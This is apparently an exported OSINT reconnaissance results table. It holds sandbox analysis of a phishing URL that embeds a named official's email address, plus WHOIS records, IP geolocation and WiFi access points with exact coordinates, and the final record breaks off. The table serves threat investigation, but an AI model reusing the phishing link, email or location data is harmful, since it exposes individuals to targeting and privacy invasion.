| 2023-05-12 03:00:33 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | vitalie.porcescu@ansa.gov.md | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://calzedokondor.co/vitalie.porcescu@ansa.gov.md', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d54_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d54_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d54_IESQMMUTEX_0_303"\n "IsoScope_d54_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d54_ConnHashTable<3412>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d54_IE_EarlyTabStart_0xebc_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3412"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"calzedokondor.co"\n "cdnjs.cloudflare.com"\n "code.jquery.com"\n "eon.nerz.cloudns.nz"\n "maxcdn.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar34FF.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3442.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.174.174.220:443"\n "35.229.48.116:443"\n "142.251.33.106:443"\n "69.16.175.10:443"\n "142.251.211.234:443"\n "104.18.22.52:443"\n "104.18.10.207:443"\n "104.17.24.14:443"\n "104.197.4.231:443"\n "172.64.203.28:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab34FE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab3441.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "RXDGIQPF.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RXDGIQPF.txt]- [targetUID: 00000000-00003844]\n Dropped file: "MA7ZTF7R.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MA7ZTF7R.txt]- [targetUID: 00000000-00003412]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "Tar34FF.tmp" has type "data"- Location: [%TEMP%\\Tar34FF.tmp]- [targetUID: 00000000-00003844]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003844]\n "jquery-3.2.1.slim.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Tar3442.tmp" has type "data"- Location: [%TEMP%\\Tar3442.tmp]- [targetUID: 00000000-00003844]\n "_5BFAE1C3-60BC-11ED-968F-08002744A090_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "favicon_6_.ico" has type "MS Windows icon resource - 1 icon 16x16 32 bits/pixel"- [targetUID: N/A]\n "~DF0E5AFAE17F79F751.TMP" has type "data"- Location: [%TEMP%\\~DF0E5AFAE17F79F751.TMP]- [targetUID: 00000000-00003412]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF8B6A0A3E86D531A7.TMP" has type "data"- Location: [%TEMP%\\~DF8B6A0A3E86D531A7.TMP]- [targetUID: 00000000-00003412]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00003844]\n "RXDGIQPF.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\RXDGIQPF.txt]- [targetUID: 00000000-00003844]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "jquery-3.1.1.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://calzedokondor.co/vitalie.porcescu@ansa.gov.md"\n Pattern match: "https://calzedokondor.co"\n Heuristic match: "calzedokondor.co"\n Heuristic match: "cdnjs.cloudflare.com"\n Heuristic match: "code.jquery.com"\n Heuristic match: "eon.nerz.cloudns.nz"\n Heuristic match: "maxcdn.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-63', u'name': u'Found a potential E-Mail address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1114', u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Pattern match: "vitalie.porcescu@ansa.gov.md"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'3/90 reputation engines marked "http://calzedokondor.co" as malicious (3% detection rate)\n 3/90 reputation engines marked "https://calzedokondor.co" as malicious (3% detection rate)\n 7/90 reputation engines marked "https://calzedokondor.co/vitalie.porcescu@ansa.gov.md" as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'7/90 Antivirus vendors marked sample as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'636c9fea72902d08670f15f1', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1114', u'suspicious_identifiers': [], u'attck_id': u'T1114', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Email Collection', u'informative_identifiers': [], u'tactic': u'Collection', u'informative_identifiers_count': 0, u'suspicious_identifiers_count': |
| 2023-05-12 03:16:29 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, HE, Germany, DE | 46.101.229.70 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_gasten (Net ID: 00:0C:E6:AD:7F:88) | 50.8897, 6.0563 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=edDiEwhb09qQfIsTtwWW7UDu1MTL3Si52Y7U9Wl3lDs5gxZDQPT8RjqeUYH5RKj%2BznpLhqhxC7IhGlKBCbb1RcMkuvy%2BQXyCAqu56mfTiAPJY0zM85v%2FwjqSATHbVC1%2FaGucnEby\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f6059be52c402-EWR"} |
| 2023-05-12 03:00:38 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | abuse@nicproxy.com | Domain Name: KEYUBU.NET
Registry Domain ID: 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.nicproxy.com
Registrar URL: http://https://nicproxy.com/
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registry Expiry Date: 2024-07-31T21:39:25Z
Registrar: Nics Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90 212 213 2963
Domain Status: ok https://icann.org/epp#ok
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: KEYUBU.NET
Registry Domain ID : 2292564483_DOMAIN_NET-VRSN
Registrar WHOIS Server : whois.nicproxy.com
Registrar URL: http://www.nicproxy.com
Updated Date: 2022-07-15T17:58:49Z
Creation Date: 2018-07-31T21:39:25Z
Registrar Registration Expiration Date: 2024-07-31T21:39:25Z
Registrar: NICS Telekomunikasyon A.S.
Registrar IANA ID: 1454
Registrar Abuse Contact Email: abuse@nicproxy.com
Registrar Abuse Contact Phone: +90.2122132963
Reseller: CIZGI TELEKOMUNIKASYON A.S - NATRO
Domain Status: ok http://www.icann.org/epp#OK
Registry Registrant ID: CID-Redacted for Privacy
Registrant Name: Redacted for Privacy
Registrant Organization: Redacted for Privacy
Registrant Street: Redacted for Privacy
Registrant City: ADANA
Registrant State / Province: Redacted for Privacy
Registrant Postal Code: Redacted for Privacy
Registrant Country: TR
Registrant Phone: Redacted for Privacy
Registrant Phone Ext: Redacted for Privacy
Registrant Fax: Redacted for Privacy
Registrant Fax Ext: Redacted for Privacy
Registrant Email: https://whoisshelter.nicproxy.com/?d=KEYUBU.NET
Registry Admin ID: CID-Redacted for Privacy
Admin Name: Redacted for Privacy
Admin Organization: Redacted for Privacy
Admin Street: Redacted for Privacy
Admin City: Redacted for Privacy
Admin State / Province: Redacted for Privacy
Admin Postal Code: Redacted for Privacy
Admin Country: Redacted for Privacy
Admin Phone: Redacted for Privacy
Admin Phone Ext: Redacted for Privacy
Admin Fax: Redacted for Privacy
Admin Fax Ext: Redacted for Privacy
Admin Email: Redacted for Privacy
Registry Tech ID: CID-Redacted for Privacy
Tech Name: Redacted for Privacy
Tech Organization: Redacted for Privacy
Tech Street: Redacted for Privacy
Tech City: Redacted for Privacy
Tech State / Province: Redacted for Privacy
Tech Postal Code: Redacted for Privacy
Tech Country: Redacted for Privacy
Tech Phone: Redacted for Privacy
Tech Phone Ext: Redacted for Privacy
Tech Fax: Redacted for Privacy
Tech Fax Ext: Redacted for Privacy
Tech Email: Redacted for Privacy
Name Server: LLOYD.NS.CLOUDFLARE.COM
Name Server: MOLLY.NS.CLOUDFLARE.COM
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T02:59:37Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
IMPORTANT: Port43 will provide the ICANN-required minimum data set per
ICANN Temporary Specification, adopted 04 Jun 2018.
Visit whois.nicproxy.com to look up contact data for domains
not covered by GDPR policy.
!****************************************************************************!
NICS Telekomunikasyon A.S., uluslararasi alan adi kayit otoritesi olan ICANN
onayli bir alan adi kayit firmasidir.
Bu alan adina ait web sitesinin icerigi ya da yayinlanmasiyla hicbir sekilde ilgisi yoktur.
Sadece, ICANN kurallari cercevesinde alan adinin kayit edilmesine aracilik yapmaktadir.
Bu alan adi sahibinin kayit sirasinda verdigi bilgiler yukaridaki gibidir.
NICS Telekomunikasyon A.S., bu bilgilerin dogrulugunu garanti edemez.
Daha fazla bilgi almak icin info [at] nicproxy.com adresine yazabilirsiniz.
!*****************************************************************************!
The data in the WHOIS database of NICS Telekomunikasyon A.S. is provided by
Nics Telekomunikasyon Ltd. for information purposes, and to assist persons in
obtaining information about or related to domain name registration
records. NICS Telekomunikasyon A.S. does not guarantee its accuracy.
By submitting a WHOIS query, you agree that you will use this data
only for lawful purposes and that, under no circumstances, you will
use this data to
1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via E-mail(spam) or
2) enable high volume, automated, electronic processes that apply
to Nics Telekomunikasyon Ltd. or its systems.
Nics Telekomunikasyon Ltd. reserves the right to modify these terms.
By submitting this query, you agree to abide by this policy.
NICProxy Whois Server Ver.1.2.2
|
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Equiscript (Net ID: 00:18:0A:6F:8C:EC) | 32.8608, -79.9746 |
| 2023-05-12 03:08:51 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.119 | 34.148.97.127 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | KKR Internal (Net ID: 00:01:21:70:65:30) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | slideshare (Category: social)
https://www.slideshare.net/ayhu | ayhu |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | WLAN (Net ID: 00:01:24:F1:C9:FE) | 37.7642, -122.3993 |
| 2023-05-12 02:59:58 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | myemail@example.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://acmephp.github.io/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_519"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ed8_IESQMMUTEX_0_303"\n "IsoScope_ed8_IE_EarlyTabStart_0xdcc_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3800"\n "IsoScope_ed8_IESQMMUTEX_0_331"\n "IsoScope_ed8_ConnHashTable<3800>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"acmephp.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<a href="https://twitter.com/acme_php">" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<i class="fa fa-twitter"></i>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<span>Follow on Twitter</span>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/acme_php">Twitter</a>" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/titouangalopin">@tgalopin</a> and" (Indicator: "dir "; File: "786RITC2.htm")\n Found string "<a href="https://twitter.com/jderusse">@jderusse</a>" (Indicator: "dir "; File: "786RITC2.htm")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\2uxtwtjr\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\ckdncxys\\favicon[1].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df48e04c2c232f3230.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{d2ad0b8a-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dff77628f7bf10b560.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{cb6dd7e9-ed80-11ed-b43f-080027944a9e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfdcbc4d5dbdf1df3e.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{cb6dd7e7-ed80-11ed-b43f-080027944a9e}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "AvenirNextLTPro-Regular_1_.woff" has type "Web Open Font Format CFF length 38024 version 0.0"- [targetUID: N/A]\n "font-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003800]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF48E04C2C232F3230.TMP" has type "data"- Location: [%TEMP%\\~DF48E04C2C232F3230.TMP]- [targetUID: 00000000-00003800]\n "~DFF77628F7BF10B560.TMP" has type "data"- Location: [%TEMP%\\~DFF77628F7BF10B560.TMP]- [targetUID: 00000000-00003800]\n "~DF6EABB9BAE595B52D.TMP" has type "data"- Location: [%TEMP%\\~DF6EABB9BAE595B52D.TMP]- [targetUID: 00000000-00003800]\n "~DFDCBC4D5DBDF1DF3E.TMP" has type "data"- Location: [%TEMP%\\~DFDCBC4D5DBDF1DF3E.TMP]- [targetUID: 00000000-00003800]\n "urlref_httpsacmephp.github.io" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "fonts_1_.css" has type "ASCII text"- [targetUID: N/A]\n "app_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._CB6DD7E7-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_CB6DD7E9-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_D2AD0B8A-ED80-11ED-B43F-080027944A9E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "SBXI2I91.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\SBXI2I91.txt]- [targetUID: 00000000-00002844]\n "CPJIWZZK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CPJIWZZK.txt]- [targetUID: 00000000-00003800]\n "C8FKJFB2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C8FKJFB2.txt]- [targetUID: 00000000-00003800]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "D3WB1LDR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\D3WB1LDR.txt]- [targetUID: 00000000-00002844]\n "YI9AAEHI.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\YI9AAEHI.txt]- [targetUID: 00000000-00003800]\n "N8OPXZSU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\N8OPXZSU.txt]- [targetUID: 00000000-00003800]\n "8X4V8G7W.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8X4V8G7W.txt]- [targetUID: 00000000-00003800]\n "786RITC2.htm" has type "HTML document UTF-8 Unicode text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\786RITC2.htm]- [targetUID: 00000000-00002844]\n 